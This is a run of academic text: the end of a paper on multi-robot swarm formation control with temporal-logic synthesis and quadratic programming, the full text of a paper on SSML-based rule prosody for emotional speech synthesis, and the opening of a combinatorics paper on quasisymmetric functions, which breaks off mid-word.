\(\mathbb{X}\subset\mathbb{R}^{n}\), the waypoint set \(W\) and the formation set \(F\) should be determined according to the specific terrain conditions of the region. A straightforward manner is to split the navigation region into \(N_{W}\) grid units and assign the geometric center or centroid of each unit as a waypoint. Then, for each waypoint, the feasible formations that can fit the terrain restrictions are determined. #### Iv-A2 Step 2: realization of the DFTS After determining the sets of waypoints and formations \(W\) and \(F\), the next step is to use a DFTS \(\mathcal{T}=\{S,A,\delta,\mathsf{AP},\mathcal{L}\}\) to realize an abstract model for the swarm system. As addressed in Sec. III-B, the state space is determined as \(S=\tilde{W}\times\tilde{F}\), where \(\tilde{W}\) and \(\tilde{F}\) are finite symbolic sets that have the same amounts of elements with \(W\) and \(F\), respectively. The action set \(A\) is also a finite symbolic set that prescribes all possible actions for certain states which are determined by the adjacency relation among different waypoints and formations, i.e., which waypoints and formations can be reached after the current ones. For a certain waypoint \(\tilde{w}\in\tilde{W}\) and \(\tilde{f}\in\tilde{F}\), the transition \(\delta\) prescribes the next feasible waypoint and formation under a certain action \(a\in A\). There are several principles to realize the action set \(A\) and the transition \(\delta\). Firstly, the adjacency relation among the waypoints and formations provides the largest sets of possible actions and transitions. Secondly, infeasible actions and transitions subject to environmental restrictions should be eliminated. For example, a transition is not realizable if the current waypoint does not guarantee sufficient space to tolerate the transient stage for the next formulation. We do not promise a universal and general approach to realizing a DFTS for swarm control. Instead, the realization pretty much depends on specific scenarios. #### Iv-A3 Step 3: Synthesis of A Control Strategy Given an LTL specification \(\psi\) and a realized DFTS \(\mathcal{T}\), a symbolic control strategy is synthesized using a model-checking-based approach that solves a game over the product automaton \(\mathcal{T}\times\psi\)[24].The resulting control strategy takes the form of a feedback control automaton, which reads the current waypoint and formation and generates an action to be applied to the transition of the DFTS. There exist off-the-shelf toolboxes that can synthesize a control strategy for LTL specifications [25, 26]. The overall synthesis procedure can be referred to [27, 23]. ### _Solving Robot Control Using Quadratic Programming_ Problem 1-2) prescribes that the states of the multi-robot swarm system should fall into the predefined sets, which can be encoded using CBFs defined in (3). Then, the robot controllers can be computed by solving a QP problem. We first give the formulation of the QP problem. Then, we provide a qualitative analysis of two important properties of the closed-loop dynamics of the swarm system, namely, convergence and safety. They are used to verify the satisfaction of the task specification and the runtime safety requirements, respectively. #### Iv-B1 Computing Robot Control Inputs Via Solving QP The solution to Problem 1-2) is given by the following QP problem in (7), for all \(i,j=1,2,\cdots,N\), \((i,j)\in\mathcal{E}\), \[\min_{z}z^{\mathrm{T}}Hz+Q^{\mathrm{T}}z\] (7a) s.t. \[\|u_{i}\|\leq u_{\mathrm{max}}, \tag{7b}\] \[\frac{\partial h_{\mathcal{W}}(x_{c},w)}{\partial x_{c}}u_{c}\! \leq\!\delta_{1}h_{\mathcal{W}}(x_{c},w) -\alpha_{1}\mathrm{max}^{\gamma_{1}}\{0,h_{\mathcal{W}}(x_{c},w)\}\] \[-\alpha_{2}\mathrm{max}^{\gamma_{2}}\{0,h_{\mathcal{W}}(x_{c},w)\},\] (7c) \[\frac{\partial h_{\mathcal{F}}(x_{ij},f_{ij})}{\partial x_{ij}}u_ {ij}\!\leq\!\delta_{1}h_{\mathcal{F}}(x_{ij},f_{ij})\] \[-\alpha_{1}\mathrm{max}^{\gamma_{1}}\{0,h_{\mathcal{F}}(x_{ij},f _{ij})\}-\alpha_{2}\mathrm{max}^{\gamma_{2}}\{0,h_{\mathcal{F}}(x_{ij},f_{ij} )\},\] (7d) \[\frac{\partial h_{\mathcal{D}}(x_{ij})}{\partial x_{ij}}u_{ij} \geq-\delta_{2}h_{\mathcal{D}}(x_{ij}),\] (7e) \[\frac{\partial h_{\mathcal{O}}(x_{i})}{\partial x_{i}}u_{i}\geq- \delta_{2}h_{\mathcal{O}}(x_{i}), \tag{7f}\] where \(z=[u^{T},\delta^{T}]^{T}\in\mathbb{R}^{2\times N+2}\) are decision variables, where \(\delta=[\,\delta_{1},\,\delta_{2}\,]\in\mathbb{R}^{2}\) are two slack variables, \(H\) is a diagonal matrix with positive constant elements, \(Q=[\,\mathbf{0}_{2\times N},w_{\delta_{1}},0\,]\) where \(w_{\delta_{1}}\in\mathbb{R}^{+}\) is a penalizing scalar of the slack variable \(\delta_{1}\), and \(u_{\mathrm{max}}\in\mathbb{R}^{+}\) defines the control limit of the system. The main purpose of involving the slack variables is to relax the constraints and improve the feasibility of the QP problem. The constant parameters \(\alpha_{1}\), \(\alpha_{2}\), \(\gamma_{1}\), \(\gamma_{1}\) are chosen as \(\alpha_{1}=\alpha_{2}=\frac{\mu\pi}{2T_{ud}}\), \(\gamma_{1}=1+\frac{1}{\mu}\), \(\gamma_{2}=1-\frac{1}{\mu}\) with \(\mu>1\). In (7), different constraints are concerned with task specifications and runtime safety requirements, respectively. Constraint (7c) imposes the swarm centroid \(x_{c}\) to reach a given waypoint \(w\in W\), constraint (7d) drives the swarm to a given formation \(\{f_{ij}\}_{(i,j)\in\mathcal{E}}\), and constraints (7f) and (7e) attempt to keep the robots within the safety sets \(\mathcal{D}\) and \(\mathcal{O}\). #### Iv-B2 Convergence Analysis of QP The convergence property of the closed-loop system evaluates whether the swarm reaches the given waypoint \(w\in W\) and formation \(F^{\prime}\!\in\!F\) sufficiently soon. From a theoretical perspective, it evaluates whether \(x_{c}\), \(x_{ij}\) enter the bounded set \(\mathcal{W}(w)\), \(\mathcal{F}(f_{ij})\) for all \(f_{ij}\in F^{\prime}\), \((i,j)\!\in\!\mathcal{E}\), within the given fixed time \(T_{ud}\), from any initial robot positions \(x_{i}(0)\in\mathbb{X}\), \(i\!\in\!\mathcal{V}\). Convergence is an important guarantee for the satisfaction of the task specification \(\psi\) and is prescribed by the feasibility of the constraints (7c) and (7d). Involving slack variables \(\delta_{1}\!\in\!\mathbb{R}^{+}\) can effectively relax the constraints and improve their feasibility. Nevertheless, the input limitations (7b) also affect the feasibility of these constraints. In [21], it is argued that larger values of \(T_{ud}\) and \(u_{\mathrm{max}}\) lead to a larger fixed-time domain of attraction, which means that a larger set of initial robot conditions allow the swarm system to reach the given waypoint \(w\) and formation \(F^{\prime}\) within time \(T_{ud}\). We can infer that there exist \(\overline{T}_{ud}\!\in\!\mathbb{R}^{+}\) and \(\overline{u}_{\mathrm{max}}\!\in\!\mathbb{R}^{+}\), such that for any \(x_{i}(0)\!\in\!\mathbb{X}\), \(i\!\in\!\mathcal{V}\), \(x_{c}\) and \(x_{ij}\) reach \(\mathcal{W}(w)\) and \(\mathcal{F}(f_{ij})\) within \(T_{ud}\) for all \(f_{ij}\!\in\!F^{\prime}\in F\), \((i,j)\!\in\!\mathcal{E}\), if \(T_{ud}>\overline{T}_{ud}\) and \(v_{\mathrm{max}}>\overline{v}_{\mathrm{max}}\). #### Iv-B3 Runtime Safety Runtime safety describes whether the robots keep collision-free for all time. From a theoretical perspective, given \(x_{i}(0)\in\mathcal{O}\) and \(x_{i}(0)-x_{j}(0)\in\mathcal{D}\), whether \(x_{i}(t)\in\mathcal{O}\) and \(x_{i}(t)-x_{j}(t)\in\mathcal{D}\) hold for all \(\mathbb{R}_{\geq 0}\). Runtime safety is ensured by the feasibility of constraints (7e) and (7f). Similar to the constraints concerned with convergence, the feasibility of these constraints can also be improved by the slack variable \(\delta_{2}\in\mathbb{R}^{+}\). However, when the robots reach the boundaries of sets \(\mathcal{D}\) and \(\mathcal{O}\), i.e., there exist \(i\!\in\!\mathcal{V}\), such that \(h_{\mathcal{O}}(x_{i})=0\), or there exist \((i,j)\in\mathcal{E}\), such that \(h_{\mathcal{D}}(x_{ij})=0\), \(\delta_{2}\) will lose its functionality in constraint (7e) or (7f) and render hard constraints. Nevertheless, these constraints are still feasible in this case. At least, there exists a trivial solution \(u_{i}=0\) or \(u_{ij}=0\). Note that the _deadlock_ phenomenon may occur when \(u_{i}=0\), \(h_{\mathcal{O}}(x_{i})=0\), \(u_{ij}=0\), \(h_{\mathcal{D}}(x_{ij})=0\) hold for all \(i\!\in\!\mathcal{V}\) and \((i,j)\!\in\!\mathcal{E}\)[28]. How to avoid deadlock has always been a challenging problem and remains an open question. It is commonly recognized that deadlock is due to the over-conservativeness of the runtime safety constraints, which provokes extreme actions of the robots. For example, the swarm is asked to squeeze into a narrow corridor or it is stuck in a dead corner of an odd-shaped obstacle. In our framework, we can prescribe the task specifications at the high-level such that the swarm can avoid going through narrow corridors or stay away from odd-shaped obstacles. In this sense, we can greatly reduce the likelihood of the deadlock phenomenon. ## V Case Study In this section, we use a swarm navigation control case in simulation to validate the efficacy of our proposed framework and solution. Consider a homogeneous swarm system that contains \(N=3\) quadrotor robots moving in a two-dimensional planar environment \(\mathbb{X}\subset\mathbb{R}^{2}\), where \(\mathbb{X}\) is a \(5\,\mathrm{m}\)\(\times\)\(5\,\mathrm{m}\) square area. The dynamic model of the \(i\)-th robot of the swarm system is given as the following single integrator \(\dot{x}_{i}(t)=u_{i}(t)\), \(i=1,2,3\), where \(x_{i}(t),u_{i}(t)\in\mathbb{R}^{2}\) are the position and control input of robot \(i\), respectively, at time \(t\!\in\!\mathbb{R}_{\geq 0}\). The terrain of the environment \(\mathbb{X}\) is illustrated in Fig. 1. The environment is split into a \(5\times 5\) grid which generates 25 even square blocks, each with a size of \(1\,\mathrm{m}\)\(\times\)\(1\,\mathrm{m}\). The yellow block is the starting point of the robot swarm. The blue block is the navigation goal that the swarm needs to reach ultimately. The red blocks are the obstacles that the robots should avoid. The waypoints are assigned as the centroids of the square blocks, which brings up \(N_{W}\!=\!|W|\!=\!25\). Also, we determine three different formations \(F=\{F^{1},F^{2},F^{3}\}\), where \(F^{k}=\{f^{k}_{12},f^{k}_{23},f^{k}_{13}\}\), \(k=1,2,3\). \(F_{1}\), \(F_{2}\), \(F_{3}\) give a horizontal formation (as shown in Fig. 1b and Fig. 1d), a vertical formation (as shown in Fig. 1a and Fig. 1e), and a triangle shape formations (Fig. (c)c), respectively. The values of the elements of \(W\) and \(F\) can be found in our online document on Github [29]. The DFTS \(\mathcal{T}\!=\!\{S,A,\delta,\mathsf{AP},\mathcal{L}\}\) as the abstract model of the quadrotor swarm is realized as follows. The state space \(S=\tilde{W}\!\times\!\tilde{F}\), where \(\tilde{W}\), \(\tilde{F}\) are realized as finite sets with \(25\) and \(3\) elements, respectively. The transition relation \(\delta\) is represented as a matrix and can also be found in our Github repository [29]. The main principles we use to construct the transition relation are as follows. * When the swarm pass by a narrow corridor, it should switch to the proper formation to fit its direction. * The swarm should not enter an obstacle region. The atomic proposition set is \(\mathsf{AP}=\mathsf{AP}_{w}\!\times\!\mathsf{AP}_{f}\), where \(\mathsf{AP}_{w}=\{\text{freespace, home, goal, obstacle}\}\) and \(\mathsf{AP}_{f}=\{\text{horizon, vertical, triangle}\}\). The label mapping is \(\mathcal{L}=\{\mathcal{L}_{w},\mathcal{L}_{f}\}\). \(\mathcal{L}_{w}\) labels the yellow block in Fig. 1 as "home", the blue block as "goal", the red blocks as "obstacle", and all other blocks as "freespace". \(\mathcal{L}_{f}\) is defined such that \(\mathcal{L}_{f}(F^{1})=\text{``horizon"}\), \(\mathcal{L}_{f}(F^{2})=\text{``vertical"}\), and \(\mathcal{L}_{f}(F^{3})=\text{``triangle"}\). The abstract model is visualized in Fig. 2, where the \(x\)-\(y\) planes along the formation axis show the planar view of the environment for different formations. Thus, Fig. 2 clearly shows the transition between the \(25\times 3\) states of the DFTS. The task is specified as an LTL formula \(\psi\!=\!\psi_{1}\!\rightarrow\!\psi_{2}\), where \[\psi_{1} :=\!\square(\neg\text{battery}\wedge\text{home}\rightarrow\bigcirc \text{battery})\] \[\wedge\square(\neg\text{battery}\wedge\neg\text{home}\rightarrow \bigcirc\neg\text{battery}),\] \[\psi_{2} :=\!\square\neg\text{obstacle}\wedge\square\lozenge(\text{goal }\wedge\text{triangle}\lozenge\text{battery},\] where "battery" is a binary variable used to describe the energy level of the robot batteries. If all robots have full batteries, "battery" is true. Otherwise, it becomes false. The specification \(\psi\) can be interpreted in the following natural language. 1. The swarm should infinitely visit "goal" in "triangle" formation, as long as "battery" is true. 2. All robots should avoid entering regions with obstacles. 3. The swarm should go back "home" to recharge once "battery" becomes false. The runtime safety requirements are formulated as bounded sets defined in Sec. III and encoded in the QP problem (7). The parameters of the bounded sets and the QP problem in (7) can also be found in our Github repository [29]. We give two important parameters \(T_{ud}\!=\!4\,\mathrm{s}\) and \(u_{\max}\!=\!5\,\mathrm{m}\)/s. The synthesis of the symbolic control strategy is solved using an off-the-shelf LTL toolbox, TuLiP [26]. The QP problem is solved using the CasADi library [30] with the ipopt solver on a commercial laptop with CPU i7-10750H. We apply the synthesized control strategy and the solution of the QP to the DFTS and the robots, respectively As a run of the simulation, we let the swarm start at "home" with a "vertical" formation. The trajectories of the robots in the environment as time changes are shown in Fig. 1. After leaving "home", the swarm goes along the horizontal corridor in a "horizon" formation, as shown in Fig. (a)a, since the narrow space does not allow other formations. In Fig. (b)b, the robot turns right and proceeds in the short horizontal corridor. It has to change to a "horizon" formation to fit the narrow space. When it passes the corridor and ultimately reaches the "goal" in the open space, it switches to the triangle formation as specified by \(\psi\), as shown in Fig. (c)c. In Fig. (d)d, at least one robot has a low battery, which set the signal "battery" as false. Fig. 1: The planar view of the environment and the robot trajectories in a simulation run, as time changes (left to right). Fig. 2: The visualization of the states of the abstract model. The three planes distributed along the \(z\)-axis are the environment with waypoints corresponding to three formations. Each small square block is an abstract state. The blue line denotes the transition of the abstract states in a simulation run. The bypassing waypoints are marked as red dots. swarm goes back to "home". Once it gets charged at "home" and the "battery" signal is true again, the robot resumes its previous task to navigate itself to the "goal" again, as shown in Fig. 0(e). From Fig. 1, we can see that the controlled swarm ensures an obstacle-free trajectory when approaching to the desired task. Also, proper formations are automatically selected to traverse narrow areas. The resulting behavior of the robot swarm completely satisfies the LTL specifications. This is also reflected by Fig. 2 which visualizes the trajectory of the robot swarm in the abstract space. Following the trajectory, we can infer similar conclusions to the above arguments that the task specification is satisfied. Therefore, we do not elaborate detailed interpretations for all abstract states. A video demonstration of this use case is available at [https://www.youtube.com/watch?v=rlaecB0eDq0](https://www.youtube.com/watch?v=rlaecB0eDq0). Now, let us inspect whether the swarm system satisfies the runtime safety requirements. Fig. 3 displays the trajectories of the robots when the swarm is given a new waypoint and formation. In this case, all robots start from the same initial position \(O\) and they are assigned with a waypoint. The green rounded region is the tolerated set of waypoint reaching. The robot swarm is required to achieve a "triangle" formation when its center reaches the waypoint. During this period, all robots should avoid collision with the red rounded obstacle. In Fig. 3, the trajectories of the robots are drawn as solid lines and the formation of the swarm is in dotted lines. It is shown that the robots successfully avoid the obstacle and finally reach the waypoint at a tolerable range. The ultimate formation is "triangle" and the reaching time is within \(T_{ud}\!=\!4\,\mathrm{s}\). This study shows that the robot controller solved from the QP problem strictly ensures not only the runtime safety requirements but also the fixed-time convergence condition. ## VI Conclusion In this paper, we develop an automated multi-robot formation synthesis framework via formal control method and QP-based controller design method to solve complex tasks for multi-robot swarm systems, where the task specifications are defined on multiple domains. The main challenge of the proposed framework is the realization of the abstract model of the swarm system. In this framework, symbolic control synthesis is performed to determine waypoints and formations that enable an abstract model of the swarm system as a DFTS. Meanwhile, feasible and safe multi-robot controllers are achieved by solving a QP problem, while fixed-time CLFs and safety-guaranteed CBFs that encode the runtime safety requirements are incorporated to enable automated multi-robot controller generation. A simulation case study validates the efficacy of the method to LTL specifications. In the proposed multi-robot swarm solution, the definition of the waypoints and formations can be generalized to incorporate other types of goals, and therefore the proposed framework can be extended to more complicated robotic tasks. We remark that the robot trajectories generated by the symbolic controller show some 'jerky' behaviors. Future work will also investigate the generation of smooth robot trajectories.
2307.02132
Going Retro: Astonishingly Simple Yet Effective Rule-based Prosody Modelling for Speech Synthesis Simulating Emotion Dimensions
We introduce two rule-based models to modify the prosody of speech synthesis in order to modulate the emotion to be expressed. The prosody modulation is based on speech synthesis markup language (SSML) and can be used with any commercial speech synthesizer. The models as well as the optimization result are evaluated against human emotion annotations. Results indicate that with a very simple method both dimensions arousal (.76 UAR) and valence (.43 UAR) can be simulated.
Felix Burkhardt, Uwe Reichel, Florian Eyben, Björn Schuller
2023-07-05T09:20:46Z
http://arxiv.org/abs/2307.02132v1
Going Retro: Astonishingly Simple Yet Effective Rule-based Prosody Modelling for Speech Synthesis Simulating Emotion Dimensions Going Retro: Astonishingly Simple Yet Effective Rule-based Prosody Modelling for Speech Synthesis Simulating Emotion Dimensions Felix Burkhardt\({}^{1}\), Uwe Reichel\({}^{1}\), Florian Eyben\({}^{1}\), Bjorn Schuller\({}^{1,2,3}\) \({}^{1}\)_audEERING GmbH, Germany, \({}^{2}\)Chair EIHW, University of Augsburg, Germany, \({}^{3}\)GLAM, Imperial College London, UK [email protected]_ **Abstract:** We introduce two rule-based models to modify the prosody of speech synthesis in order to modulate the emotion to be expressed. The prosody modulation is based on speech synthesis markup language (SSML) and can be used with any commercial speech synthesizer. The models as well as the optimization result are evaluated against human emotion annotations. Results indicate that with a very simple method both dimensions arousal (.76 UAR) and valence (.43 UAR) can be simulated. ## 1 Introduction Affect-modulated speech synthesis of a text can be achieved amongst others by modifying the prosody of the utterance accordingly [1]. In this work, emotions will be represented in terms of the dimensional approach of Schlosberg [2], who identified the three emotion dimensions valence, arousal, and dominance. _Valence_ is referred to as _pleasure_ in the following. For this paper, we neglect the dominance dimension for the benefit to focus on the main topic: the control of emotional expression in speech synthesis with a very limited set of prosodic rules. ### Acoustic correlates of emotions For each of these dimensions, several acoustic correlates have been found. These findings are summarized in [3], [4], and [5] (for further details please see the references therein). High as opposed to low arousal is characterized by higher speech rate, higher intensity mean and variability, higher fundamental frequency (\(F_{0}\)) mean and variability, higher spectral balance indicating increased vocal effort, and a higher first formant due to an increased mouth opening. Positive as opposed to negative pleasure is amongst others characterized by higher speech rate and by lower intensity mean and variability. In addition, pleasure is positively correlated with the second formant due to more lip spreading caused by smiling [6]. The relation between pleasure and pitch is more complicated as found by [7, 1, 8]: Higher \(F_{0}\) characterizes both elation joy (positive) and fear (negative), while comfort (positive) and boredom (negative) are both reflected by lower \(F_{0}\)[1]. In general, many results from the literature, for example [9, 10, 11], indicate that it is difficult to predict and simulate the valence dimension by acoustic cues alone, as opposed to linguistic ones, an assumption that is confirmed also in this investigation. ### Emotions in speech synthesis There are many articles that deal with the simulation of emotional speech and even many that review them, for example [12, 13, 14]; we refer to these for a deeper discussion. Historically, first algorithms to simulate emotional expression were based on prosody rules and categorical emotions. Later, and in line with the new statistical techniques to synthesize speech, data based approaches were used and emotional dimensions as well as speaking styles targeted. Triantafyllopoulos et al. review deep learning based approaches in [15]. Marc Schroder was the first on to target emotional dimensions with prosody rules in his dissertation [11] and his work is one of the foundations of this paper. An approach to simulate emotion dimensions with learned features was presented by Hamada [10] by mapping acoustic features to the valence-arousal space. Later, Stanton et al. [16] showed how to target the latent space within a Tacotron architecture to generate expressive speaking styles. ### Emotional simulation with SSML Within the scope of the European H2020 EASIER project [17], we faced the problem to enable a, not-yet emotional but available in many languages, commercial speech synthesizer to simulate emotional expression. The obvious way to do this, in a way that is agnostic to a specific synthesizer, is to utilize the W3C's Speech Synthesis Markup Language (SSML) [18] which is, at least in parts, interpreted by almost all speech synthesis engines that are available. This has also been done for categorical emotions by Shaikh et al. [19]. SSML amongst others allows for specifying prosodic modifications of an utterance along the prosodic dimensions pitch, energy, and duration. Thus, speech synthesis can be affect-modulated by mapping emotion dimensions to prosodic parameters based on the findings above, and by passing on these parameters to the Text to speech (TTS) engine via SSML. We tested this for the commercial Google Speech API1 and the open source MARY TTS engine [20], where the support is only partial. Footnote 1: [https://cloud.google.com/text-to-speech](https://cloud.google.com/text-to-speech) This paper is structured as follows: In section 2, we introduce two rule-based model variants in order to adapt the prosody of an utterance accordingly. In sections 3 and 4, we describe the perceptual evaluation procedure and their results, respectively. Section 5 concludes the paper with an outlook. Contributions of this paper are as follows: * We present two approaches to simulate emotional dimensions with SSML, which has to our knowledge not been done before. * We simulate the valence dimension by a very simple pitch manipulation approach. ## 2 Rule-based affect modulation In our study, emotion scores are mapped to speech prosody parameters in two rule-based algorithms based on the findings introduced in section 1. ### Method syntact As a naive baseline we simply implemented the prosody rules as being positively correlated with pitch and speech rate. To distinguish between arousal and valence, we simply assigned speech rate to arousal and pitch to valence, an approach that worked surprisingly well. Of course, we can not be sure if the outcomes are specific to the Google synthesizer that was used to generate the samples. ### Method Schroeder To try out a more complex approach than Syntact, we implemented a very reduced version of the approach that Marc Schroder described in his dissertation [21]. To this end, we analyzed Schroeder's MARY TTS [20] sources 2. According to the sources, we extracted the rules displayed in Listing 2.2, originally in Java, and implemented them in the Python language. Footnote 2: [https://github.com/marytts/marytts/blob/79e4edef3f478dcef0aad3609ba77090e91f0b6d/marytts-client/src/main/resources/marytts/tools/emospeak/emotion-to-mary.xsl](https://github.com/marytts/marytts/blob/79e4edef3f478dcef0aad3609ba77090e91f0b6d/marytts-client/src/main/resources/marytts/tools/emospeak/emotion-to-mary.xsl) ``` pitch=>0.3*arousal+0.1*valence-0.1*power pitch-dynamics=>-15+0.3*arousal-0.3*power range(insemitones)=>4+0.04*arousal range-dynamics(min100)=>-40+1.2*arousal+0.4*power accent-prominence=>0.5*arousal-0.5*valence preferred-accent-shape=>whenvalence<-20:falling, whenvalence>40:alternating,elserising accent-slope=>1*arousal-0.5*valence rate=>0.5*arousal+0.2*valence number-of-pauses=>0.7*$arousalpause duration=>-0.2*arousal vowel-duration=>0.3*valence+0.3*power nasal-duration=>0.3*valence+0.3*power liquid-duration=>0.3*valence+0.3*power plosive-duration=>0.5*arousal-0.3*valence fricative-duration=>0.5*arousal-0.3*valence volume=>50+0.33*arousal ``` To implement this in SSML, we filtered the list for pitch and speech rate global values resulting in the two rules shown in Listing 2.2. These rules had already been tested in the scope of a project to generate an appropriate robot voice for children with the autistic spectrum [22]. The resulting values were then scaled as described in the next Section. Of course, this is only a very small subset of the rules defined by Marc Schroder and this might well be the main reason that this approach did not show to be very successful. ``` pitch=>0.3*arousal+0.1*valence -0.1*power rate=>0.5*arousal+0.2*valence ``` Listing 2: Reduced prosody rules according to the MARY emotion module ### Mapping from dimensions to rules We adapted the emotion to prosody mapping approach of [23]: Values for the emotion dimensions arousal, and pleasure are mapped to the _pitch_, _rate_, and _volume_ attributes of the SSML element \(<\)prosody\(>\). This mapping is carried out in the following way: 1. rescale the scores of emotion dimension \(e\in\{\)pleasure, arousal\(\}\) to the range \([-1,1]\) 2. calculate each of the prosody parameters \(y\in\{\)pitch, rate, volume\(\}\) by the following linear combination \[y = \sum_{e\in\{\text{pleasure, arousal}\}}w_{e,y}\cdot e\] (1) 3. rescale \(y\) to a range defined by still natural sounding minimum and maximum values of the respective prosody dimension. For both variants, Schroeder, and Syntact, all weights \(w_{e,y}\) of emotion dimension \(e\) for the calculation of the prosodic dimension \(y\) were set manually based on perceptual expert judgments how well the synthesized speech prosodically matches the intended emotions. [23] showed that emotion recognition performance can be increased by adding emotional speech samples synthesized this way to the training data. For reproducibility, all code is open sourced in the Syntact gitlab repository3. Footnote 3: [https://github.com/felixbur/syntAct](https://github.com/felixbur/syntAct) ## 3 Perceptual Evaluation We conducted a perception experiment to validate the effectiveness of the approaches. We used the Google speech API as a speech synthesizer, with the standard male and female voices. As text material, we used two short sentences of the Berlin Emotional Database [24], which are meant to be emotionally undecided: * "_In sieben Stunden wird es soweit sein._" (_it will happen in seven hours._) * "_Heute Abend konnte ich es ilm sagen._" (_i could tell him tonight._) The idea is that these sentences are neither too mundane nor already have a linguistic emotional connotation. These four combinations (two sexes times two sentences) were synthesised with both methods and with all combinations (9) of three valence and arousal levels: \(.1,.5,.9\), with \(.5\) being the neutral level. resulting in 72 samples (\(2\cdot 2\cdot 2\cdot 9\)). The samples were annotated by 10 subjects employed by audEERING GmbH using the I-hear-U-play platform [25]. The labelers were 6 women and 4 men of mean age 34.87 years with 13.79 years standard deviation. After judging 10 test samples to get acquainted with the task, they answered for each sample the following two questions: * "_Please rate the arousal level on a scale of low, mid, and high._" * "_Please rate the valence level on a scale of negative, neutral, and positive._" To measure the inter-rater agreement we used Fleiss' kappa, the results are depicted in Table 1. While the raters could agree on the arousal annotations, the values are only slightly agreed on for valence when simulated by the Syntact method but not for the Schroeder method. \begin{table} \begin{tabular}{r|c c} Fleiss’ \(\kappa\) & **Arousal** & **Valence** \\ \hline **Schroeder** &.467 &.067 \\ **Syntact** &.445 &.121 \\ \hline **All** &.461 &.112 \\ \end{tabular} \end{table} Table 1: Fleiss’ kappa values for inter rater agreement for arousal and valence levels for methods Schroeder, Syntact, and all values. ## 4 Results The results of the perception experiment are shown in Table 2. The confusion matrix for the arousal dimension levels is shown in Figure 1 and for the valence dimension in Figure 2. The results were computed based on all listeners ratings, without a unified label. As can be seen, the simulation of arousal was successful with both approaches but to a clearly higher degree with the simpler Syntact method. For the Schroeder method, low arousal is often confused with the neutral versions and the neutrally meant samples with high arousal. With respect to valence, we must admit that we were only partly successful with the Syntact method. As outlined above, this may largely be also due to the fact that it is mostly convey in linguistic information. This has recently again been shown also for deep representations of acoustics that succeed in better automatic valence recognition from speech due to their inherent encoding of linguistics [26]. Nonetheless, we think this is a valuable finding because this method basically hypothesizes that valence correlates positively with pitch which is an interesting approach based on its simplicity. The samples generated by the Schroeder method were labeled as neutral or high valence by the majority of the listeners, an outcome perhaps that indicates that the "normal" expression of the Google voices is rather friendly. As discussed in Section 1, it is quite difficult to simulate the valence dimension by acoustic cues alone and accordingly, we are satisfied to have reached even a partial success. Figure 1: Confusion matrices between intended and perceived arousal levels. Left: model Schroeder, Right: model Syntact Figure 2: Confusion matrices between intended and perceived valence levels. Left: model Schroeder, Right: model Syntact ## 5 Conclusion and Outlook This paper investigated two methods to simulate emotional expression in speech synthesis by controlling prosody with SSML. The chosen method following a (strongly) reduced version of Marc Schroder's work did not outperform our rather naive baseline. Of course, we cannot be sure if the outcomes are specific to the Google synthesizer that was used to generate the samples. Hence, a more general investigation that includes several speech engines will remain future work. Also, it is much more promising to learn emotion-to-expression rules from data than to manually determine them based on isolated trials, amongst others because emotional expression is at least to a degree culture specific and the same rules can not be applied in all cultural and social contexts. This has to our knowledge not yet been done for SSML-based approaches and also remains future work. Thirdly, we restricted the investigation on two dimensions; valence and arousal. Future studies will take at least the dominance dimension into account, which is important to distinguish for example _anger_ from _fear_. It further appears interesting to measure how automatic speech emotion recogniser would recognise such rule- and SSML-based samples. In addition, one could evaluate if they could be used for model augmentation as was first suggested in [27]. On the opposing end - and likewise closing the circle between analysis and synthesis, one could implement a related rule- and SSML-based recognition of emotion from speech. Presumably, however, this would require some form of speaker normalisation grounded in neutral speech, hence, requiring an enrolment procedure. ## 6 Acknowledgements This research has been partly funded by the European SHIFT (MetamorphoSis of cultural Heritage Into augmented hypermedia assets For enhanced accessibiliTy and inclusion) project (Grant Agreement number: 101060660).
2302.07694
Quasicrystal Structure of Fundamental Quasisymmetric Functions, and Skeleton of Crystals
We use crystals of tableaux and descent compositions to understand the decomposition of Schur functions $s_\lambda$ into Gessel's fundamental quasisymmetric functions $F_\alpha$. The connected crystal of tableaux $B(\lambda)$, associated to $s_\lambda$, is shown to be partitionned into a disjoint union of connected induced subgraphs $B(T_\alpha)$ corresponding to the $F_\alpha$'s. We show that these subgraphs, which we call quasicrystals, are isomorphic (as graphs) to specific crystals of tableaux. This allows us to give a formula for the number of tableaux of shape $\lambda$ and maximal entry $n$. We also use this setting to give a constructive proof of a combinatorial formula for Kostka numbers $K^\lambda_\mu$. We study the position of the quasicrystals within the crystal $B(\lambda)$, and show that they appear in dually positionned pairs, with the crystal anti-automorphism between them being given by a generalization of Sch\"utzenberger's evacuation. We introduce the notion of skeleton of the crystal $B(\lambda)$ given by replacing each subgraph $B(T_\alpha)$ by the associated standard tableau of shape $\lambda$. We conjecture that its graph includes the dual equivalence graph for $\lambda$, introduced by Assaf, and that its subgraphs of tableaux with fixed number of descents have particular structures. Finally, we describe applications to plethysm, among which we give an algorithm to express any symmetric sum of fundamental quasisymmetric functions into the Schur basis, whose construction gives insight into the relationship between the two basis.
Florence Maas-Gariépy
2023-02-15T14:38:52Z
http://arxiv.org/abs/2302.07694v1
# Quasicrystal Structure of Fundamental Quasisymmetric Functions, and Skeleton of Crystals ###### Abstract We use crystals of tableaux and descent compositions to understand the decomposition of Schur functions \(s_{\lambda}\) into Gessel's fundamental quasisymmetric functions \(F_{\alpha}\). The connected crystal of tableaux \(B(\lambda)\), associated to \(s_{\lambda}\), is shown to be partitionned into a disjoint union of connected induced subgraphs \(B(T_{\alpha})\) corresponding to the \(F_{\alpha}\)'s. We show that these subgraphs, which we call quasicrystals, are isomorphic (as graphs) to specific crystals of tableaux. This allows us to give a formula for the number of tableaux of shape \(\lambda\) and maximal entry \(n\). We also use this setting to give a constructive proof of a combinatorial formula for Kostka numbers \(K_{\mu}^{\lambda}\). We study the position of the quasicrystals within the crystal \(B(\lambda)\), and show that they appear in dually positionned pairs, with the crystal anti-automorphism between them being given by a generalization of Schutzenberger's evacuation. We introduce the notion of skeleton of the crystal \(B(\lambda)\) given by replacing each subgraph \(B(T_{\alpha})\) by the associated standard tableau of shape \(\lambda\). We conjecture that its graph includes the dual equivalence graph for \(\lambda\), introduced by Assaf, and that its subgraphs of tableaux with fixed number of descents have particular structures. Finally, we describe applications to plethysm, among which we give an algorithm to express any symmetric sum of fundamental quasisymmetric functions into the Schur basis, whose construction gives insight into the relationship between the two basis. ## Introduction Quasisymmetric functions were introduced by Gessel [19], in the context of the study of symmetric functions, which they generalise. Notably, the plethysm \(s_{\mu}[s_{\lambda}]\) of two Schur functions has been shown to be a sum of fundamental quasisymmetric functions [10]. Understanding the decomposition of such a plethysm into the Schur basis has been an open problem for more than 80 years, since its initial introduction by Littlewood [13]. Therefore, studying both the basis of fundamentatal 